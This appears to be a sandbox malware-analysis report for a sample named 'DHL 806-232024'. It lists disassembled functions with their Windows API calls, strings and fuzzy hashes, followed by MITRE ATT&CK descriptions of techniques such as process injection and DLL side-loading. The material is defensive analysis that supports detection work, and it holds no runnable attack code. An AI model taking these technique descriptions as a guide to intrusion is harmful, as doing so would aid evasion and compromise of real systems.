Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: a010839821e8d447d0b87f4b8f21649ca00717efcb6f2fcbfb50dfb5c6177d42
Instruction ID: 3ef9ab8e8e864e38fd453157e207d27c96601a6d16f37aa0d79d4e2650b70a8f
Opcode Fuzzy Hash: a010839821e8d447d0b87f4b8f21649ca00717efcb6f2fcbfb50dfb5c6177d42
Instruction Fuzzy Hash: 16318D71210604AAEB10DF69CC90BFB77BDFF88721F508A19F9A5C7190DA31AC95DB60

Function 00932D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00932E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00932E3B

Strings

0, xrefs: 00932DF9

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a00d2b8d67042b21b367db2765274627c4682fe3ffafcdf842fb712a60447295
Instruction ID: 970e71f70e5052ff2bd37142bf204db9dc936f0c2fc1f8dfc25098eeb418c538
Opcode Fuzzy Hash: a00d2b8d67042b21b367db2765274627c4682fe3ffafcdf842fb712a60447295
Instruction Fuzzy Hash: DB31E631604309EBEB34CF58D846BAEBBBDFF45350F14042AE995E61A0E7749940CF51

Function 00956943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009569D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009569DB

Strings

Combobox, xrefs: 0095699D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: d754452f6bd9f58746caab25234981be885daa6effa0a71bf431f2ac499bf8f0
Instruction ID: bc95859719afc3e439746260e4795f8388d7b2aa4e4f14c4b6f343b28314ea71
Opcode Fuzzy Hash: d754452f6bd9f58746caab25234981be885daa6effa0a71bf431f2ac499bf8f0
Instruction Fuzzy Hash: C911E2712002086FEF11DF29CCA0EAB376EEB893A5F500125FD5897290D6319C5587A0

Function 00956E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91

GetWindowRect.USER32(00000000,?), ref: 00956EE0
GetSysColor.USER32(00000012), ref: 00956EFA

Strings

static, xrefs: 00956EBD

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 3e3d094274cafbf68da204c23156a7515122066a4d0075cb8d44bfe1f0307575
Instruction ID: 5edfa7d760ccc140129fabe42328147d42e1ea5c5f2b986c9587a8f23c52e240
Opcode Fuzzy Hash: 3e3d094274cafbf68da204c23156a7515122066a4d0075cb8d44bfe1f0307575
Instruction Fuzzy Hash: 0A215972A20209AFDF04DFA9CD45AFA7BB8FB08315F044629FD55D3250E734E8659B50

Function 00956B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00956C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00956C20

Strings

edit, xrefs: 00956BF5

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: fe1da73ba937cb233a278f7da8836a57ac3fc5254ef9052d46b7eec46c4c06a2
Instruction ID: 963f336128aa6f40f84ca6a71e51c579438b46e170c8bc0acf60ebad0ddfc638
Opcode Fuzzy Hash: fe1da73ba937cb233a278f7da8836a57ac3fc5254ef9052d46b7eec46c4c06a2
Instruction Fuzzy Hash: B1119D71105208ABEF108E65DC41ABB376DEB4437AF904724FEA0D71E0C735EC99A760

Function 00932E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00932F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00932F30

Strings

0, xrefs: 00932F07

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: c0497647065d15a94f7e5e893b3049e83399340784f3a0ee6fef6b70534be4d9
Instruction ID: 584e98762585e5163e780864cd5d3de32f596a1def4fe8157f98d26f65a556e7
Opcode Fuzzy Hash: c0497647065d15a94f7e5e893b3049e83399340784f3a0ee6fef6b70534be4d9
Instruction Fuzzy Hash: 4A11EF32915228ABCB20DF5DDC45BAA73BDEB05350F0800A2E944AB2A0D7B0EE04CF91

Function 009424CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00942520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00942549

Strings

<local>, xrefs: 00942511

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 8c19d645ed4071586db50a43fcae1d4646fcfdf15be39471c64c4be4be0a70a5
Instruction ID: 0545f3ff47917798ff7909409b367131ae73dd72d74cb75d98cb02cc83a6ed47
Opcode Fuzzy Hash: 8c19d645ed4071586db50a43fcae1d4646fcfdf15be39471c64c4be4be0a70a5
Instruction Fuzzy Hash: 2511CEB0601225BADB249F628C99EBBFFACFF06765F50812AF90547140D2B46981DBF0

Function 009480A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0094830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009480C8,?,00000000,?,?), ref: 00948322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB
htons.WSOCK32(00000000,?,00000000), ref: 00948108

Strings

255.255.255.255, xrefs: 009480E3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: a7b417bcce42cbe6dec7ff20cb9a998fed83079c5fb2cbe1614b091edf6c8bf5
Instruction ID: 77d721b0b6140bc6f6a72d44cedac2c3806a7994ab4ee22986e176c5aa93ee6c
Opcode Fuzzy Hash: a7b417bcce42cbe6dec7ff20cb9a998fed83079c5fb2cbe1614b091edf6c8bf5
Instruction Fuzzy Hash: 5811E134204315ABDB20AF64CC46FFEB374FF48320F108627EA1197291DB72A801C795

Function 009292E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00929355

Strings

ComboBox, xrefs: 009292F4
ListBox, xrefs: 0092931F

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 85421f5ef8c8f6da53ded5d0ca38c873cd19739fbc6ddf33d72ef8bd23f3b5e2
Instruction ID: 70e8b66d5859eb8edc93bd502d8b9a9eda559996b6ed9cf05463f3b3fbce777e
Opcode Fuzzy Hash: 85421f5ef8c8f6da53ded5d0ca38c873cd19739fbc6ddf33d72ef8bd23f3b5e2
Instruction Fuzzy Hash: F801D271A45224AB8B04EB64CC919FE73A9FF46320F14071AF832973D5DB3158088751

Function 0093901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00939036
__fread_nolock.LIBCMT ref: 0093904B

Strings

EA06, xrefs: 0093907D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 79453de18e0c039a78f3b14d0d74a9c55de6849349811bd62c82d8976e7a0988
Instruction ID: 4e3361c6787b9ef62e9d5a788e72db9a1445a7e17d5815bec52dee496958648f
Opcode Fuzzy Hash: 79453de18e0c039a78f3b14d0d74a9c55de6849349811bd62c82d8976e7a0988
Instruction Fuzzy Hash: 6301F971914218AEDB28CAA8C81AFFE7BFCDB01311F00419AF652D2181E5B5E6048B60

Function 009291DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0092924D

Strings

ComboBox, xrefs: 009291EC
ListBox, xrefs: 00929217

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 27956885180476ef610eed7dd3408ef88e8575347100e5d49a62e74ba400b812
Instruction ID: 9d2dec4d3a30373e916e36b4dd9dd3b0554678679891507972658e05f7d1d726
Opcode Fuzzy Hash: 27956885180476ef610eed7dd3408ef88e8575347100e5d49a62e74ba400b812
Instruction Fuzzy Hash: DB01A771A41229BBCB19EBA4D992EFF73ACEF45300F14011AB912A7385EE155F0C9672

Function 00929264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 009292D0

Strings

ComboBox, xrefs: 00929271
ListBox, xrefs: 0092929C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 49b543d439fc1db811a79c667c995634192eefe9ad73b52e5547d5d0db36b8cc
Instruction ID: 00c925ab828ce528732a40b5914afc989610b15927147081fb6d9a9cfe2c57fe
Opcode Fuzzy Hash: 49b543d439fc1db811a79c667c995634192eefe9ad73b52e5547d5d0db36b8cc
Instruction Fuzzy Hash: CE01DB71A41129BBCB15F7A4D982EFF77ACEF11300F2401167812B3385DA155F0C9272

Function 009351CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009351E8
_wcscmp.LIBCMT ref: 009351FA

Strings

#32770, xrefs: 009351F4

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: a6409c16e708413ab8a8695bcf5506fc047be029fe5fbf337673c567853bee3d
Instruction ID: f16886632beba5ca38535d41774f72b1d745b1f9b7334211f5dbeb9ab4e54635
Opcode Fuzzy Hash: a6409c16e708413ab8a8695bcf5506fc047be029fe5fbf337673c567853bee3d
Instruction Fuzzy Hash: CFE06832A0432C2BE320AAA9AC09FA7F7ACFB45731F01006BFD20D3040E5609A448BE1

Function 009281BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009281CA

Part of subcall function 008F3598: _doexit.LIBCMT ref: 008F35A2

Strings

Error allocating memory., xrefs: 009281C3
AutoIt, xrefs: 009281BE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 82283f99ce586e27a86000fa5b8be7aa126b5e1ce5194bf8ff6602e3daa92a15
Instruction ID: 4d3136990a6419524a47071e204eb867983ff5b05d85df88e2ded27ab2500383
Opcode Fuzzy Hash: 82283f99ce586e27a86000fa5b8be7aa126b5e1ce5194bf8ff6602e3daa92a15
Instruction Fuzzy Hash: A7D05B323C672C32D21432BD6C0BFDA76489B55B56F044016FB08D55D38DD5599153DA

Function 0090B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0090B564: _memset.LIBCMT ref: 0090B571

Part of subcall function 008F0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0090B540,?,?,?,008D100A), ref: 008F0B89

IsDebuggerPresent.KERNEL32(?,?,?,008D100A), ref: 0090B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008D100A), ref: 0090B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0090B54E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: da9ba24fdac47746fe095abe0ad5c8ffd7ab6ec01f5c8b61791ab115cf7f80f6
Instruction ID: 77ba2ab8ae57e57134ff3d9313f73e678687964873c5250856590428173a2fbb
Opcode Fuzzy Hash: da9ba24fdac47746fe095abe0ad5c8ffd7ab6ec01f5c8b61791ab115cf7f80f6
Instruction Fuzzy Hash: 06E06DB02147118FD720DF29D8047467BE4AF00755F00896DF456C3791E7B4D408CB61

Function 00955BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00955BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00955C08

Part of subcall function 009354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E

Strings

Shell_TrayWnd, xrefs: 00955BEE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c69e9f36f3ab309c762895e714999fc5ee136c17118e87f31b25a086676329a3
Instruction ID: 9dc280995aa2b0834ea28c11cc717bcf8f28f976c1b808aa94b39cde71cbfe89
Opcode Fuzzy Hash: c69e9f36f3ab309c762895e714999fc5ee136c17118e87f31b25a086676329a3
Instruction Fuzzy Hash: 88D0C9313AC311B7E768BB71AC5FFA76A14AB44B62F050825B745AA1E0D9E45801D750

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

